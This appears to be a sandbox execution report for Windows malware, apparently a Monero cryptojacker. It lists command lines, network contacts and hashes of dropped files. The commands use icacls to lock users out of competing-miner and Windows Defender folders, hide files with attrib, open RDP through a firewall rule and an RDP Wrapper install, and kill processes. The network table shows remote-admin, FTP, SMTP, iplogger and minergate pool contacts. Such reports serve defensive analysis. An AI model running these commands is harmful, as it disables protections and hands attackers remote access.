C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\disk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Logs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\windows\min /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\users\john"
C:\Windows\system32\taskeng.exe
taskeng.exe {90E3BEB8-5991-46C4-B1FF-81344D55E145} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 194.67.198.139:21 | tcp | |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | kaen.progaming-cheats.ru | udp |
| UA | 185.13.5.48:80 | kaen.progaming-cheats.ru | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
Files
C:\ProgramData\Microsoft\Intel\Cheat.exe
| MD5 | b9d686e28cae6847ff0cae312f820509 |
| SHA1 | 53af47ab5eb4d1d68d380a7efd9c64cc772b4235 |
| SHA256 | abc359397b8c978490ae5bc15ce1edd8250df5f3205dd00c3857dd6716445d11 |
| SHA512 | 985ff2b2062101de5ab60f6109dc20b16d54c6b06059d789daf4fc78033fd71deefc25787bd4602397310c89f3397e099f4959a60349abb8cff6b82b8b211e1a |
\ProgramData\Microsoft\Intel\Logs.exe
| MD5 | 32942d3c314bbdf1620cd88103041704 |
| SHA1 | 30d0e5acd4cd2d564fc0238bbd6b2817429a1d21 |
| SHA256 | a5db8a2bfa0de0450b68df20d485031b84ff1bc05870635614c1753668ea62a4 |
| SHA512 | 96a50e3ac5209ccf9e98a1489ee5e48c4b3643e5f29ecc0ad4a7ea5fe9d2db2c20969cd599b071833e5ecca6ce01b89416cd0a9555416aa475cc23a69f682c02 |
C:\ProgramData\Microsoft\Intel\L.bat
| MD5 | 6d744b6b4f26582054765190f2a48fc4 |
| SHA1 | f8389be05be2dcbe7b805048d47366da34e654bb |
| SHA256 | 5cec12c6eb8148a88120e020c5a8ec694e1d2b00d88965cb77ce85c936012b7a |
| SHA512 | 95dbf7a2845dfc307ac208c65baff017f65663f0ff8e4ce27100f2ab7c2fdb5a008148eb5f80a25eb2e91f117817a71e1a947114163b75c3948a33cc00135abc |
\ProgramData\Microsoft\Intel\winit.exe
| MD5 | d2a13f45e422348e79683468f2d72f48 |
| SHA1 | a4a5fd1e42499123f6fc7a6995a88707efbec8a8 |
| SHA256 | 9ed880c9e5219168275ea143b4e2e526ff765f4e5c7c7b43224cb8f5cbbbc9aa |
| SHA512 | 6ecd9cb874f724aea6d63dfa031dd28c3ccd0c07c31088b57701902cd397e04e7dc97b4bbde515e80c043840a71728b899b3729bfb5dc001c4166c3442154513 |
C:\ProgramData\Windows\winit.exe
| MD5 | 0ad9af59a50ebe8e71794c8d6d5b202f |
| SHA1 | 89a63d35581171ba9dff6451295988ff6d108ae9 |
| SHA256 | 5ce115d29377c45b23db067b3f5e77f46e96686b48e7ee4a5ad6e8d52ee5bf0e |
| SHA512 | a69be9e2a5c153dd0cc0783ff24de6a07a02758239979b411d397b7527c676ae9751b92978686999dff00d9c36d1bfbf5f3e9358a98fa6d375876e8a402d339a |
C:\Programdata\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
C:\Programdata\Windows\install.bat
| MD5 | e4d54fbfd7517dc5ca4297a811af79a7 |
| SHA1 | fc1bbcdfaa699340ac02a1fec087c2102d612d81 |
| SHA256 | 9abd59853172258f9eaf360933c13c27bd855e4c7b37840a8f75ea51b0826f3c |
| SHA512 | a5c678becf3c38fcf92dc93506bd252596c346a75a939436b8f2087ab3b5b3b72a577c668e11ff71078276f15ead06676dc6ed3f6d1e0c6df35a896c13989878 |
\ProgramData\Microsoft\Intel\svchost.exe
| MD5 | 70ad47ac024936a6bccfd95567c1edfa |
| SHA1 | e1bbe7726bf970c08c2125a54c78fd479e6995ed |
| SHA256 | 56a363311361e03dc395d274de67c2a64068df6b163389be80c7b6736ad0c5da |
| SHA512 | 7929024c6af401066a9afc23d4da42b906f293935bc1628aa0fe901fba46ae979de4cb7818a1bfae9532d9a810987fe5209dadb508d42e0495f294f4b10651b4 |
C:\Programdata\Windows\regedit.reg
| MD5 | 0a9de68d3dc8e3191ba1f6f7c9f195b3 |
| SHA1 | fabdedf2bc4a2417ac04048e5e736243838f40bd |
| SHA256 | d4919ef008472afe0d896f71be43ceeb1a6fe16da5f9c5ce82bda5c454c5fd1f |
| SHA512 | 22664679f30beef86bf7f4108f7965251dfdf05c56dc30b031d3cbd7b49935f37df5d32ea3aba921a6d2ca64ae7ac9ceca540efd28cece1d0b91524018e25c65 |
C:\programdata\microsoft\intel\P.exe
| MD5 | 4ef6e64af66845bcf9c1bd324e51517f |
| SHA1 | 8f56d5884dd44d875deee14654b081fc407490a7 |
| SHA256 | 5abc1e7138cd3f9ed1d61b6dd5d505c8898ae9cc7f49e0ee45b93be991f520c8 |
| SHA512 | e353f29636a51c5d379aaccf8354e75eaf2a4b90648f63e8becf6a7d9379f3e51bcb7584453e7b3697586396a5e650c12197dcfd7c04e23a3e7bbe011ad1d87c |
C:\ProgramData\Microsoft\rootsystem\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
C:\programdata\microsoft\rootsystem\P.vbs
| MD5 | f014e69809bdf87b37697644a1d220d9 |
| SHA1 | 4ba0b73ae8a569e52acecf6b5c4c750fa4949d81 |
| SHA256 | c3931da2d007c38d897f2417972d64983a1c82fc6f1381590c3b93d9e794b6ee |
| SHA512 | e0254ee2317c2b375f66725d6c3ad32e9dd53167641cf677ca662f2727a0fa582905e5f7180ddbe686c1d485b889a6e0d2fa5c3052e295731795755ef3e6c299 |
C:\programdata\microsoft\rootsystem\1.exe
| MD5 | 622610a2cc797a4a41f5b212aa98bde0 |
| SHA1 | bfe47dce0d55df24aa5b6d59c442cf85c618176e |
| SHA256 | 7f11dabe46bf0af8973ce849194a587bd0ba1452e165faf028983f85b2b624c2 |
